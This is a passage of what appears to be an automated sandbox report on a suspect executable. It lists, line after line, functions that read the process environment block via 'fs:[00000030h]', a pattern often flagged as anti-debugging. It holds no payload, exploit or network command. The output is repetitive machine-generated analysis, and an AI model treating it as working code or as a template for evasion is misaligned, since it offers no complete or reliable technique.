Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B8E4 mov eax, dword ptr fs:[00000030h]	2_2_00F1B8E4
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B8E4 mov eax, dword ptr fs:[00000030h]	2_2_00F1B8E4
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B8D0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8B8D0 mov ecx, dword ptr fs:[00000030h]	2_2_00F8B8D0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B8D0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B8D0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B8D0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B8D0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2F0BF mov ecx, dword ptr fs:[00000030h]	2_2_00F2F0BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2F0BF mov eax, dword ptr fs:[00000030h]	2_2_00F2F0BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2F0BF mov eax, dword ptr fs:[00000030h]	2_2_00F2F0BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]	2_2_00F220A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]	2_2_00F220A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]	2_2_00F220A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]	2_2_00F220A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]	2_2_00F220A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]	2_2_00F220A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F390AF mov eax, dword ptr fs:[00000030h]	2_2_00F390AF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF9080 mov eax, dword ptr fs:[00000030h]	2_2_00EF9080
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F73884 mov eax, dword ptr fs:[00000030h]	2_2_00F73884
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F73884 mov eax, dword ptr fs:[00000030h]	2_2_00F73884
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB2073 mov eax, dword ptr fs:[00000030h]	2_2_00FB2073
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC1074 mov eax, dword ptr fs:[00000030h]	2_2_00FC1074
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F10050 mov eax, dword ptr fs:[00000030h]	2_2_00F10050
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F10050 mov eax, dword ptr fs:[00000030h]	2_2_00F10050
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A830 mov eax, dword ptr fs:[00000030h]	2_2_00F1A830
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A830 mov eax, dword ptr fs:[00000030h]	2_2_00F1A830
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A830 mov eax, dword ptr fs:[00000030h]	2_2_00F1A830
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A830 mov eax, dword ptr fs:[00000030h]	2_2_00F1A830
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0B02A mov eax, dword ptr fs:[00000030h]	2_2_00F0B02A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0B02A mov eax, dword ptr fs:[00000030h]	2_2_00F0B02A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0B02A mov eax, dword ptr fs:[00000030h]	2_2_00F0B02A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0B02A mov eax, dword ptr fs:[00000030h]	2_2_00F0B02A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]	2_2_00F2002D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]	2_2_00F2002D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]	2_2_00F2002D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]	2_2_00F2002D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]	2_2_00F2002D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F77016 mov eax, dword ptr fs:[00000030h]	2_2_00F77016
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F77016 mov eax, dword ptr fs:[00000030h]	2_2_00F77016
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F77016 mov eax, dword ptr fs:[00000030h]	2_2_00F77016
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC4015 mov eax, dword ptr fs:[00000030h]	2_2_00FC4015
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC4015 mov eax, dword ptr fs:[00000030h]	2_2_00FC4015
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]	2_2_00EFB1E1
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]	2_2_00EFB1E1
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]	2_2_00EFB1E1
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F841E8 mov eax, dword ptr fs:[00000030h]	2_2_00F841E8
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F751BE mov eax, dword ptr fs:[00000030h]	2_2_00F751BE
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F751BE mov eax, dword ptr fs:[00000030h]	2_2_00F751BE
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F751BE mov eax, dword ptr fs:[00000030h]	2_2_00F751BE
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F751BE mov eax, dword ptr fs:[00000030h]	2_2_00F751BE
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov eax, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov eax, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov eax, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF mov eax, dword ptr fs:[00000030h]	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F769A6 mov eax, dword ptr fs:[00000030h]	2_2_00F769A6
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F261A0 mov eax, dword ptr fs:[00000030h]	2_2_00F261A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F261A0 mov eax, dword ptr fs:[00000030h]	2_2_00F261A0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB49A4 mov eax, dword ptr fs:[00000030h]	2_2_00FB49A4
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB49A4 mov eax, dword ptr fs:[00000030h]	2_2_00FB49A4
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB49A4 mov eax, dword ptr fs:[00000030h]	2_2_00FB49A4
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB49A4 mov eax, dword ptr fs:[00000030h]	2_2_00FB49A4
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F22990 mov eax, dword ptr fs:[00000030h]	2_2_00F22990
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1C182 mov eax, dword ptr fs:[00000030h]	2_2_00F1C182
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2A185 mov eax, dword ptr fs:[00000030h]	2_2_00F2A185
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFC962 mov eax, dword ptr fs:[00000030h]	2_2_00EFC962
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFB171 mov eax, dword ptr fs:[00000030h]	2_2_00EFB171
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFB171 mov eax, dword ptr fs:[00000030h]	2_2_00EFB171
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B944 mov eax, dword ptr fs:[00000030h]	2_2_00F1B944
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B944 mov eax, dword ptr fs:[00000030h]	2_2_00F1B944
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2513A mov eax, dword ptr fs:[00000030h]	2_2_00F2513A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2513A mov eax, dword ptr fs:[00000030h]	2_2_00F2513A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F14120 mov eax, dword ptr fs:[00000030h]	2_2_00F14120
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F14120 mov eax, dword ptr fs:[00000030h]	2_2_00F14120
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F14120 mov eax, dword ptr fs:[00000030h]	2_2_00F14120
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F14120 mov eax, dword ptr fs:[00000030h]	2_2_00F14120
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F14120 mov ecx, dword ptr fs:[00000030h]	2_2_00F14120
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF9100 mov eax, dword ptr fs:[00000030h]	2_2_00EF9100
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF9100 mov eax, dword ptr fs:[00000030h]	2_2_00EF9100
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF9100 mov eax, dword ptr fs:[00000030h]	2_2_00EF9100
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F22AE4 mov eax, dword ptr fs:[00000030h]	2_2_00F22AE4
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F22ACB mov eax, dword ptr fs:[00000030h]	2_2_00F22ACB
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]	2_2_00F0AAB0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]	2_2_00F0AAB0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2FAB0 mov eax, dword ptr fs:[00000030h]	2_2_00F2FAB0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]	2_2_00EF52A5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]	2_2_00EF52A5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]	2_2_00EF52A5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]	2_2_00EF52A5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]	2_2_00EF52A5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2D294 mov eax, dword ptr fs:[00000030h]	2_2_00F2D294
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2D294 mov eax, dword ptr fs:[00000030h]	2_2_00F2D294
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F3927A mov eax, dword ptr fs:[00000030h]	2_2_00F3927A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FAB260 mov eax, dword ptr fs:[00000030h]	2_2_00FAB260
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FAB260 mov eax, dword ptr fs:[00000030h]	2_2_00FAB260
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC8A62 mov eax, dword ptr fs:[00000030h]	2_2_00FC8A62
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBEA55 mov eax, dword ptr fs:[00000030h]	2_2_00FBEA55
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF9240 mov eax, dword ptr fs:[00000030h]	2_2_00EF9240
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF9240 mov eax, dword ptr fs:[00000030h]	2_2_00EF9240
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF9240 mov eax, dword ptr fs:[00000030h]	2_2_00EF9240
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF9240 mov eax, dword ptr fs:[00000030h]	2_2_00EF9240
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F84257 mov eax, dword ptr fs:[00000030h]	2_2_00F84257
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]	2_2_00F1B236
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]	2_2_00F1B236
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]	2_2_00F1B236
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]	2_2_00F1B236
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]	2_2_00F1B236
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]	2_2_00F1B236
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]	2_2_00F1A229
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]	2_2_00F1A229
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]	2_2_00F1A229
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]	2_2_00F1A229
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]	2_2_00F1A229
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]	2_2_00F1A229
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]	2_2_00F1A229
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]	2_2_00F1A229
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]	2_2_00F1A229
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F34A2C mov eax, dword ptr fs:[00000030h]	2_2_00F34A2C
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F34A2C mov eax, dword ptr fs:[00000030h]	2_2_00F34A2C
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F13A1C mov eax, dword ptr fs:[00000030h]	2_2_00F13A1C
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBAA16 mov eax, dword ptr fs:[00000030h]	2_2_00FBAA16
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBAA16 mov eax, dword ptr fs:[00000030h]	2_2_00FBAA16
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFAA16 mov eax, dword ptr fs:[00000030h]	2_2_00EFAA16
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFAA16 mov eax, dword ptr fs:[00000030h]	2_2_00EFAA16
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F08A0A mov eax, dword ptr fs:[00000030h]	2_2_00F08A0A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF5210 mov eax, dword ptr fs:[00000030h]	2_2_00EF5210
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF5210 mov ecx, dword ptr fs:[00000030h]	2_2_00EF5210
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF5210 mov eax, dword ptr fs:[00000030h]	2_2_00EF5210
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF5210 mov eax, dword ptr fs:[00000030h]	2_2_00EF5210
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]	2_2_00F203E2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]	2_2_00F203E2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]	2_2_00F203E2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]	2_2_00F203E2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]	2_2_00F203E2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]	2_2_00F203E2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1DBE9 mov eax, dword ptr fs:[00000030h]	2_2_00F1DBE9
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FA23E3 mov ecx, dword ptr fs:[00000030h]	2_2_00FA23E3
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FA23E3 mov ecx, dword ptr fs:[00000030h]	2_2_00FA23E3
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FA23E3 mov eax, dword ptr fs:[00000030h]	2_2_00FA23E3
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F753CA mov eax, dword ptr fs:[00000030h]	2_2_00F753CA
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F753CA mov eax, dword ptr fs:[00000030h]	2_2_00F753CA
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC5BA5 mov eax, dword ptr fs:[00000030h]	2_2_00FC5BA5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F24BAD mov eax, dword ptr fs:[00000030h]	2_2_00F24BAD
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F24BAD mov eax, dword ptr fs:[00000030h]	2_2_00F24BAD
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F24BAD mov eax, dword ptr fs:[00000030h]	2_2_00F24BAD
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2B390 mov eax, dword ptr fs:[00000030h]	2_2_00F2B390
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F22397 mov eax, dword ptr fs:[00000030h]	2_2_00F22397
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1EB9A mov eax, dword ptr fs:[00000030h]	2_2_00F1EB9A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1EB9A mov eax, dword ptr fs:[00000030h]	2_2_00F1EB9A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB138A mov eax, dword ptr fs:[00000030h]	2_2_00FB138A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2138B mov eax, dword ptr fs:[00000030h]	2_2_00F2138B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2138B mov eax, dword ptr fs:[00000030h]	2_2_00F2138B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2138B mov eax, dword ptr fs:[00000030h]	2_2_00F2138B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FAD380 mov ecx, dword ptr fs:[00000030h]	2_2_00FAD380
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F01B8F mov eax, dword ptr fs:[00000030h]	2_2_00F01B8F
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F01B8F mov eax, dword ptr fs:[00000030h]	2_2_00F01B8F
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F23B7A mov eax, dword ptr fs:[00000030h]	2_2_00F23B7A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F23B7A mov eax, dword ptr fs:[00000030h]	2_2_00F23B7A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFDB60 mov ecx, dword ptr fs:[00000030h]	2_2_00EFDB60
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC8B58 mov eax, dword ptr fs:[00000030h]	2_2_00FC8B58
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFDB40 mov eax, dword ptr fs:[00000030h]	2_2_00EFDB40
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFF358 mov eax, dword ptr fs:[00000030h]	2_2_00EFF358
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB131B mov eax, dword ptr fs:[00000030h]	2_2_00FB131B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
